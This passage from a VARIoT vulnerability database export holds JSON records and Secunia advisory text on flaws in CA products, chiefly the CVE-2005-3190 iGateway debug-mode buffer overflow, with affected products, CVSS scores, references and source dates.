"trust": 0.2,
"url": "http://secunia.com/advisories/secunia_security_advisories/"
},
{
"trust": 0.2,
"url": "http://secunia.com/vulnerability_scanning/personal/"
},
{
"trust": 0.2,
"url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org"
},
{
"trust": 0.2,
"url": "http://secunia.com/advisories/about_secunia_advisories/"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2011-1036"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/43377/#comments"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/43377/"
},
{
"trust": 0.1,
"url": "https://ca.secunia.com/?page=viewadvisory\u0026vuln_id=43377"
},
{
"trust": 0.1,
"url": "https://support.ca.com."
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/43490/#comments"
},
{
"trust": 0.1,
"url": "https://ca.secunia.com/?page=viewadvisory\u0026vuln_id=43490"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/43490/"
},
{
"trust": 0.1,
"url": "http://www.zerodayinitiative.com/advisories/disclosure_policy/"
},
{
"trust": 0.1,
"url": "http://secunia.com/"
},
{
"trust": 0.1,
"url": "http://twitter.com/thezdi"
},
{
"trust": 0.1,
"url": "http://www.tippingpoint.com"
},
{
"trust": 0.1,
"url": "http://www.zerodayinitiative.com"
},
{
"trust": 0.1,
"url": "http://lists.grok.org.uk/full-disclosure-charter.html"
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-11-093"
},
{
"db": "VULHUB",
"id": "VHN-48981"
},
{
"db": "BID",
"id": "46539"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-004302"
},
{
"db": "PACKETSTORM",
"id": "99241"
},
{
"db": "PACKETSTORM",
"id": "98719"
},
{
"db": "PACKETSTORM",
"id": "99243"
},
{
"db": "PACKETSTORM",
"id": "98694"
},
{
"db": "NVD",
"id": "CVE-2011-1036"
},
{
"db": "CNNVD",
"id": "CNNVD-201102-367"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "ZDI",
"id": "ZDI-11-093"
},
{
"db": "VULHUB",
"id": "VHN-48981"
},
{
"db": "BID",
"id": "46539"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-004302"
},
{
"db": "PACKETSTORM",
"id": "99241"
},
{
"db": "PACKETSTORM",
"id": "98719"
},
{
"db": "PACKETSTORM",
"id": "99243"
},
{
"db": "PACKETSTORM",
"id": "98694"
},
{
"db": "NVD",
"id": "CVE-2011-1036"
},
{
"db": "CNNVD",
"id": "CNNVD-201102-367"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2011-02-23T00:00:00",
"db": "ZDI",
"id": "ZDI-11-093"
},
{
"date": "2011-02-25T00:00:00",
"db": "VULHUB",
"id": "VHN-48981"
},
{
"date": "2011-02-23T00:00:00",
"db": "BID",
"id": "46539"
},
{
"date": "2012-03-27T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2011-004302"
},
{
"date": "2011-03-14T11:36:59",
"db": "PACKETSTORM",
"id": "99241"
},
{
"date": "2011-02-25T04:53:57",
"db": "PACKETSTORM",
"id": "98719"
},
{
"date": "2011-03-14T11:37:04",
"db": "PACKETSTORM",
"id": "99243"
},
{
"date": "2011-02-24T01:23:59",
"db": "PACKETSTORM",
"id": "98694"
},
{
"date": "2011-02-25T18:00:02.167000",
"db": "NVD",
"id": "CVE-2011-1036"
},
{
"date": "2011-02-28T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201102-367"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2011-02-23T00:00:00",
"db": "ZDI",
"id": "ZDI-11-093"
},
{
"date": "2018-10-09T00:00:00",
"db": "VULHUB",
"id": "VHN-48981"
},
{
"date": "2011-02-25T14:28:00",
"db": "BID",
"id": "46539"
},
{
"date": "2012-03-27T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2011-004302"
},
{
"date": "2023-11-07T02:06:56.430000",
"db": "NVD",
"id": "CVE-2011-1036"
},
{
"date": "2011-02-28T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201102-367"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "PACKETSTORM",
"id": "98719"
},
{
"db": "PACKETSTORM",
"id": "98694"
},
{
"db": "CNNVD",
"id": "CNNVD-201102-367"
}
],
"trust": 0.8
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "CA ISS Used in CA HIPS of XML Security Database Parser class Vulnerabilities in arbitrary programs being downloaded to client machines",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2011-004302"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "design error",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201102-367"
}
],
"trust": 0.6
}
}
VAR-200510-0155
Vulnerability from variot - Updated: 2023-12-18 13:30Buffer overflow in Computer Associates (CA) iGateway 3.0 and 4.0 before 4.0.050623, when running in debug mode, allows remote attackers to execute arbitrary code via HTTP GET requests. Multiple Computer Associates products are susceptible to a remote buffer overflow vulnerability. This issue is due to a failure of the affected products to properly bounds check user-supplied data prior to copying it to an insufficiently sized memory buffer. This issue exists in the iTechnology iGateway component that is included in multiple Computer Associates products. Versions 1.x, 2.x, and the current 4.x versions of the iGateway component are not affected by this issue. Version 3.0.040107 and earlier 3.x versions are affected. This issue is only exploitable if the non-default components are installed, the 'igateway.conf' configuration file has debugging enabled, and the service is then manually restarted. Computer Associates is the world's leading security vendor, products include a variety of antivirus software.
TITLE: CA iGateway Debug Mode HTTP GET Request Buffer Overflow
SECUNIA ADVISORY ID: SA17085
VERIFY ADVISORY: http://secunia.com/advisories/17085/
CRITICAL: Moderately critical
IMPACT: System access
WHERE:
From remote
SOFTWARE: CA iGateway 4.x http://secunia.com/product/5821/ CA iGateway 3.x http://secunia.com/product/5820/
DESCRIPTION: Erika Mendoza has reported a vulnerability in CA iGateway, which can be exploited by malicious people to compromise a vulnerable system.
The vulnerability is caused due to a boundary error when parsing HTTP GET requests.
Successful exploitation requires that debug mode is enabled.
The vulnerability has been reported in version 3.0 and 4.0 released prior to 2005-06-23.
Note: Exploit code for this vulnerability is publicly available.
SOLUTION: The vendor recommends that iGateway should not be run in debug mode.
PROVIDED AND/OR DISCOVERED BY: Erika Mendoza
ORIGINAL ADVISORY: http://www3.ca.com/threatinfo/vulninfo/vuln.aspx?id=33485
About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities.
Subscribe: http://secunia.com/secunia_security_advisories/
Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/
Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor.
Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
Show details on source website
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-200510-0155",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "igateway",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "3.0"
},
{
"model": "igateway",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "4.0"
},
{
"model": "igateway",
"scope": "eq",
"trust": 0.6,
"vendor": "ca",
"version": "3.0"
},
{
"model": "igateway",
"scope": "eq",
"trust": 0.6,
"vendor": "ca",
"version": "4.0"
},
{
"model": "associates unicenter web server management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.0"
},
{
"model": "associates unicenter service matrix analysis",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.0"
},
{
"model": "associates unicenter service level management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.0"
},
{
"model": "associates unicenter service fulfillment",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.0"
},
{
"model": "associates unicenter service fulfillment",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2.2"
},
{
"model": "associates unicenter service desk knowledge tools",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.0"
},
{
"model": "associates unicenter service desk",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.0"
},
{
"model": "associates unicenter service delivery",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.0"
},
{
"model": "associates unicenter service catalog/fulfillment/accounting",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.0"
},
{
"model": "associates unicenter mq management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.0"
},
{
"model": "associates unicenter management for websphere",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.0"
},
{
"model": "associates unicenter management for weblogic",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.0"
},
{
"model": "associates unicenter exchange management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.0"
},
{
"model": "associates unicenter ca web services distributed management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.0"
},
{
"model": "associates unicenter autosys jm",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.0"
},
{
"model": "associates unicenter asset portfolio management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.0"
},
{
"model": "associates unicenter application server managment",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.0"
},
{
"model": "associates unicenter application performance monitor",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.0"
},
{
"model": "associates harvest change manager",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "7.1"
},
{
"model": "associates etrust web service security",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8.0"
},
{
"model": "associates etrust secure content manager",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8.0"
},
{
"model": "associates etrust integrated threat management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8.0"
},
{
"model": "associates etrust identity minder",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8.0"
},
{
"model": "associates etrust audit irecorders",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8.0"
},
{
"model": "associates etrust audit irecorders sp3",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.5"
},
{
"model": "associates etrust audit irecorders sp2",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.5"
},
{
"model": "associates etrust audit aries",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8.0"
},
{
"model": "associates etrust audit aries sp3",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.5"
},
{
"model": "associates etrust audit aries sp2",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.5"
},
{
"model": "associates etrust admin",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8.1"
},
{
"model": "associates etrust admin",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8.0"
},
{
"model": "associates brightstor srm",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.5"
},
{
"model": "associates brightstor srm",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.1"
},
{
"model": "associates brightstor srm",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "6.4"
},
{
"model": "associates brightstor srm",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "6.3"
},
{
"model": "associates brightstor san manager",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.5"
},
{
"model": "associates brightstor san manager",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.1"
},
{
"model": "associates brightstor process automation manager",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.1"
},
{
"model": "associates brightstor portal",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.1"
},
{
"model": "associates brightstor enterprise backup",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "10.5"
},
{
"model": "associates brightstor arcserve backup for windows",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.0"
},
{
"model": "associates brightstor arcserve backup",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.5"
},
{
"model": "associates brightstor arcserve backup",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.1"
},
{
"model": "associates brightstor arcserve backup",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "9.1"
},
{
"model": "associates arcserve backup for laptops and desktops",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.1"
},
{
"model": "associates arcserve backup for laptops and desktops",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.0"
},
{
"model": "associates advantage data transformer",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2.2"
}
],
"sources": [
{
"db": "BID",
"id": "15025"
},
{
"db": "NVD",
"id": "CVE-2005-3190"
},
{
"db": "CNNVD",
"id": "CNNVD-200510-074"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:broadcom:igateway:3.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:igateway:4.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2005-3190"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "EMendoza erikam@gmail.com",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200510-074"
}
],
"trust": 0.6
},
"cve": "CVE-2005-3190",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": true,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "VHN-14399",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2005-3190",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-200510-074",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-14399",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-14399"
},
{
"db": "NVD",
"id": "CVE-2005-3190"
},
{
"db": "CNNVD",
"id": "CNNVD-200510-074"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Buffer overflow in Computer Associates (CA) iGateway 3.0 and 4.0 before 4.0.050623, when running in debug mode, allows remote attackers to execute arbitrary code via HTTP GET requests. Multiple Computer Associates products are susceptible to a remote buffer overflow vulnerability. This issue is due to a failure of the affected products to properly bounds check user-supplied data prior to copying it to an insufficiently sized memory buffer. \nThis issue exists in the iTechnology iGateway component that is included in multiple Computer Associates products. \nVersions 1.x, 2.x, and the current 4.x versions of the iGateway component are not affected by this issue. Version 3.0.040107 and earlier 3.x versions are affected. This issue is only exploitable if the non-default components are installed, the \u0027igateway.conf\u0027 configuration file has debugging enabled, and the service is then manually restarted. Computer Associates is the world\u0027s leading security vendor, products include a variety of antivirus software. \n\nTITLE:\nCA iGateway Debug Mode HTTP GET Request Buffer Overflow\n\nSECUNIA ADVISORY ID:\nSA17085\n\nVERIFY ADVISORY:\nhttp://secunia.com/advisories/17085/\n\nCRITICAL:\nModerately critical\n\nIMPACT:\nSystem access\n\nWHERE:\n\u003eFrom remote\n\nSOFTWARE:\nCA iGateway 4.x\nhttp://secunia.com/product/5821/\nCA iGateway 3.x\nhttp://secunia.com/product/5820/\n\nDESCRIPTION:\nErika Mendoza has reported a vulnerability in CA iGateway, which can\nbe exploited by malicious people to compromise a vulnerable system. \n\nThe vulnerability is caused due to a boundary error when parsing HTTP\nGET requests. \n\nSuccessful exploitation requires that debug mode is enabled. \n\nThe vulnerability has been reported in version 3.0 and 4.0 released\nprior to 2005-06-23. \n\nNote: Exploit code for this vulnerability is publicly available. \n\nSOLUTION:\nThe vendor recommends that iGateway should not be run in debug mode. \n\nPROVIDED AND/OR DISCOVERED BY:\nErika Mendoza\n\nORIGINAL ADVISORY:\nhttp://www3.ca.com/threatinfo/vulninfo/vuln.aspx?id=33485\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\neverybody keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2005-3190"
},
{
"db": "BID",
"id": "15025"
},
{
"db": "VULHUB",
"id": "VHN-14399"
},
{
"db": "PACKETSTORM",
"id": "40602"
}
],
"trust": 1.35
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-14399",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-14399"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "BID",
"id": "15025",
"trust": 2.0
},
{
"db": "SECUNIA",
"id": "17085",
"trust": 1.8
},
{
"db": "SREASON",
"id": "86",
"trust": 1.7
},
{
"db": "SECTRACK",
"id": "1015045",
"trust": 1.7
},
{
"db": "OSVDB",
"id": "19920",
"trust": 1.7
},
{
"db": "NVD",
"id": "CVE-2005-3190",
"trust": 1.7
},
{
"db": "CNNVD",
"id": "CNNVD-200510-074",
"trust": 0.7
},
{
"db": "SEEBUG",
"id": "SSVID-71303",
"trust": 0.1
},
{
"db": "EXPLOIT-DB",
"id": "1243",
"trust": 0.1
},
{
"db": "EXPLOIT-DB",
"id": "16801",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-14399",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "40602",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-14399"
},
{
"db": "BID",
"id": "15025"
},
{
"db": "PACKETSTORM",
"id": "40602"
},
{
"db": "NVD",
"id": "CVE-2005-3190"
},
{
"db": "CNNVD",
"id": "CNNVD-200510-074"
}
]
},
"id": "VAR-200510-0155",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-14399"
}
],
"trust": 0.01
},
"last_update_date": "2023-12-18T13:30:56.365000Z",
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "NVD-CWE-Other",
"trust": 1.0
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2005-3190"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.0,
"url": "http://www3.ca.com/securityadvisor/vulninfo/vuln.aspx?id=33485"
},
{
"trust": 1.7,
"url": "http://www.securityfocus.com/bid/15025"
},
{
"trust": 1.7,
"url": "http://archives.neohapsis.com/archives/fulldisclosure/2005-10/0349.html"
},
{
"trust": 1.7,
"url": "http://archives.neohapsis.com/archives/fulldisclosure/2005-10/0418.html"
},
{
"trust": 1.7,
"url": "http://www.osvdb.org/19920"
},
{
"trust": 1.7,
"url": "http://securitytracker.com/id?1015045"
},
{
"trust": 1.7,
"url": "http://secunia.com/advisories/17085"
},
{
"trust": 1.7,
"url": "http://securityreason.com/securityalert/86"
},
{
"trust": 1.7,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/22560"
},
{
"trust": 0.3,
"url": "http://www.ca.com/"
},
{
"trust": 0.3,
"url": "/archive/1/413408"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/17085/"
},
{
"trust": 0.1,
"url": "http://secunia.com/secunia_security_advisories/"
},
{
"trust": 0.1,
"url": "http://www3.ca.com/threatinfo/vulninfo/vuln.aspx?id=33485"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5821/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5820/"
},
{
"trust": 0.1,
"url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org"
},
{
"trust": 0.1,
"url": "http://secunia.com/about_secunia_advisories/"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-14399"
},
{
"db": "BID",
"id": "15025"
},
{
"db": "PACKETSTORM",
"id": "40602"
},
{
"db": "NVD",
"id": "CVE-2005-3190"
},
{
"db": "CNNVD",
"id": "CNNVD-200510-074"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-14399"
},
{
"db": "BID",
"id": "15025"
},
{
"db": "PACKETSTORM",
"id": "40602"
},
{
"db": "NVD",
"id": "CVE-2005-3190"
},
{
"db": "CNNVD",
"id": "CNNVD-200510-074"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2005-10-13T00:00:00",
"db": "VULHUB",
"id": "VHN-14399"
},
{
"date": "2005-10-06T00:00:00",
"db": "BID",
"id": "15025"
},
{
"date": "2005-10-11T23:51:24",
"db": "PACKETSTORM",
"id": "40602"
},
{
"date": "2005-10-13T22:02:00",
"db": "NVD",
"id": "CVE-2005-3190"
},
{
"date": "2005-10-13T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200510-074"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-07-11T00:00:00",
"db": "VULHUB",
"id": "VHN-14399"
},
{
"date": "2005-10-06T00:00:00",
"db": "BID",
"id": "15025"
},
{
"date": "2021-04-09T16:56:08.623000",
"db": "NVD",
"id": "CVE-2005-3190"
},
{
"date": "2021-04-12T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200510-074"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200510-074"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Computer Associates Multiple products HTTP Request remote overflow vulnerability",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200510-074"
}
],
"trust": 0.6
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "other",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200510-074"
}
],
"trust": 0.6
}
}
VAR-201604-0426
Vulnerability from variot - Updated: 2023-12-18 13:19CRLF injection vulnerability in CA API Gateway (formerly Layer7 API Gateway) 7.1 before 7.1.04, 8.0 through 8.3 before 8.3.01, and 8.4 before 8.4.01 allows remote attackers to have an unspecified impact via unknown vectors. Supplementary information : CWE Vulnerability type by CWE-93: Improper Neutralization of CRLF Sequences (CRLF injection ) Has been identified. http://cwe.mitre.org/data/definitions/93.htmlA third party may be affected unspecified. An attacker can exploit this issue to add arbitrary headers to a webpage. This may aid in further attacks. CA has fixes available. Update to the fix version indicated below. All Rights Reserved. One CA Plaza, Islandia, N.Y. 11749. All other trademarks, trade names, service marks, and logos referenced herein belong to their respective companies.
-----BEGIN PGP SIGNATURE----- Charset: utf-8
